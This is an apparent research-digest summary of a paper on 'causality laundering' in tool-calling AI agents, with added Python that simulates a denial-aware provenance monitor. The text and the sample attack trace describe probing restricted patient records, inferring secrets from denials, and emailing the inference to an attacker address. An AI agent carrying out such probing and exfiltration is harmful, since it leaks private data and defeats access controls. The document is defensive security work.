The world is being quietly rearranged by people who write very long documents.


The title they went with: Causality Laundering: Denial-Feedback Leakage in Tool-Calling LLM Agents. Noisy translates that to:

Tool-calling AI agents can leak secrets through denied requests — and now there's a runtime defense


A security vulnerability in AI agents that use external tools lets attackers infer private information from what the system refuses to do, then smuggle that inferred data out through later innocent-looking requests. Researchers built a runtime monitor that tracks causal chains between denied actions and subsequent tool calls, blocking the leak while adding negligible processing overhead.
AI agents deployed in production now routinely access private databases, invoke external APIs, and trigger real-world actions, from reading medical records to initiating financial transfers. The vulnerability is that attackers don't need direct access to secrets: they can probe which requests the system refuses to execute, learn something from the refusal itself (for example, that a record exists and is restricted), and exfiltrate that inference through a later, innocuous-looking tool call. This matters because standard provenance tracking only follows data that a tool actually returned; a denial returns no data, so the inference drawn from it carries no label and passes the sink unchecked. The runtime monitor closes that gap by labelling denials as well as returned data and propagating both along the causal chain to later tool calls, which means organizations running production agents can defend against a class of attack that existing provenance layers miss entirely.
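To make the two pathways concrete, here is an added example of a denial-aware provenance monitor wrapped around a simulated tool-calling loop. It is illustration code written for this summary, not the paper's implementation or its evaluation harness. It assumes the agent is stood in for by a fixed trace of tool calls, that each step records which earlier steps its arguments were derived from (the causal chain a real monitor would have to reconstruct from the model's context), and that the tool names, patient IDs, policy and email addresses are constructed sample data.

```python
"""Denial-aware provenance monitor for a simulated tool-calling agent.

Added example, not code from the paper or the page. The agent is replaced
by a fixed trace of tool calls; each step records which earlier steps its
arguments were derived from (standing in for the causal chain a real
monitor would reconstruct from the model's context). All records, IDs,
tool names and addresses below are constructed for illustration.
"""
from dataclasses import dataclass, field

# Constructed sample data: which patient IDs exist, and which are restricted.
RECORDS = {"P-1001": "oncology", "P-1002": "dermatology", "P-1003": "psychiatry"}
RESTRICTED = {"P-1001", "P-1003"}
SENSITIVE_TOOLS = {"read_record"}  # tools whose outputs (or denials) carry secrets
SINK_TOOLS = {"send_email"}        # tools that move data outside the system


def read_record(patient_id: str) -> str:
    return RECORDS.get(patient_id, "no such record")


def send_email(to: str, body: str) -> str:
    return f"sent to {to}: {body}"


TOOLS = {"read_record": read_record, "send_email": send_email}


def policy(tool: str, args: dict) -> tuple:
    """Access policy. The denial message itself discloses that the record exists and is restricted."""
    if tool == "read_record" and args["patient_id"] in RESTRICTED:
        return False, "access denied: restricted record"
    return True, "ok"


@dataclass
class Step:
    tool: str
    args: dict
    derived_from: list = field(default_factory=list)  # indices of earlier steps this call depends on


def _key(step: Step) -> str:
    return step.tool + ":" + ",".join(f"{k}={v}" for k, v in sorted(step.args.items()))


def run_trace(trace: list, denial_aware: bool) -> list:
    """Execute a trace under the monitor; returns one (status, output) pair per step.

    denial_aware=False: classic provenance, only data actually returned by a
    sensitive tool is labelled. denial_aware=True: a denial by a sensitive tool
    is labelled too, so an inference drawn from it is tracked to the sink.
    """
    labels = []   # provenance label set attached to each step's outcome
    results = []
    for step in trace:
        inherited = set()
        for i in step.derived_from:
            inherited |= labels[i]
        # A sink call whose arguments causally depend on any labelled outcome is refused.
        if step.tool in SINK_TOOLS and inherited:
            labels.append(inherited)
            results.append(("blocked", f"sink carries labels {sorted(inherited)}"))
            continue
        allowed, reason = policy(step.tool, step.args)
        if not allowed:
            own = {"denial:" + _key(step)} if denial_aware and step.tool in SENSITIVE_TOOLS else set()
            labels.append(inherited | own)
            results.append(("denied", reason))
            continue
        output = TOOLS[step.tool](**step.args)
        own = set()
        if step.tool in SENSITIVE_TOOLS and step.args["patient_id"] in RECORDS:
            own = {"data:" + _key(step)}  # direct data flow: classic provenance label
        labels.append(inherited | own)
        results.append(("ok", output))
    return results


# Constructed attack trace: probe records, learn from the denials which IDs are
# restricted, then exfiltrate that inference through an innocuous-looking email.
PROBE_AND_LEAK = [
    Step("read_record", {"patient_id": "P-1001"}),
    Step("read_record", {"patient_id": "P-1003"}),
    Step("read_record", {"patient_id": "P-9999"}),
    Step("send_email", {"to": "attacker@example.net", "body": "flagged: P-1001, P-1003"},
         derived_from=[0, 1, 2]),
]
# Direct data flow: read an unrestricted record and mail its contents.
DIRECT_LEAK = [
    Step("read_record", {"patient_id": "P-1002"}),
    Step("send_email", {"to": "attacker@example.net", "body": "dermatology"}, derived_from=[0]),
]
# Benign: an email that depends on no sensitive step.
BENIGN = [Step("send_email", {"to": "user@example.net", "body": "meeting at 3"})]

if __name__ == "__main__":
    for name, trace in [("probe+leak", PROBE_AND_LEAK), ("direct", DIRECT_LEAK), ("benign", BENIGN)]:
        for aware in (False, True):
            print(name, "denial_aware=%s" % aware, run_trace(trace, aware)[-1])
```

Run as a script, the probe-and-leak trace ends in `ok` under classic provenance (the email is sent, because no tool ever returned labelled data) and in `blocked` under the denial-aware monitor; the direct-flow trace is blocked by both, and the benign email passes both. The `derived_from` links are the crux: in a real deployment the monitor has to derive that causal dependence from the agent's context rather than have the agent declare it, which is where the paper's overhead and complexity live.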
Watch whether organizations deploying tool-calling agents adopt this kind of denial-aware provenance enforcement, or whether the overhead and complexity cause teams to skip it in favor of simpler (but weaker) controls.
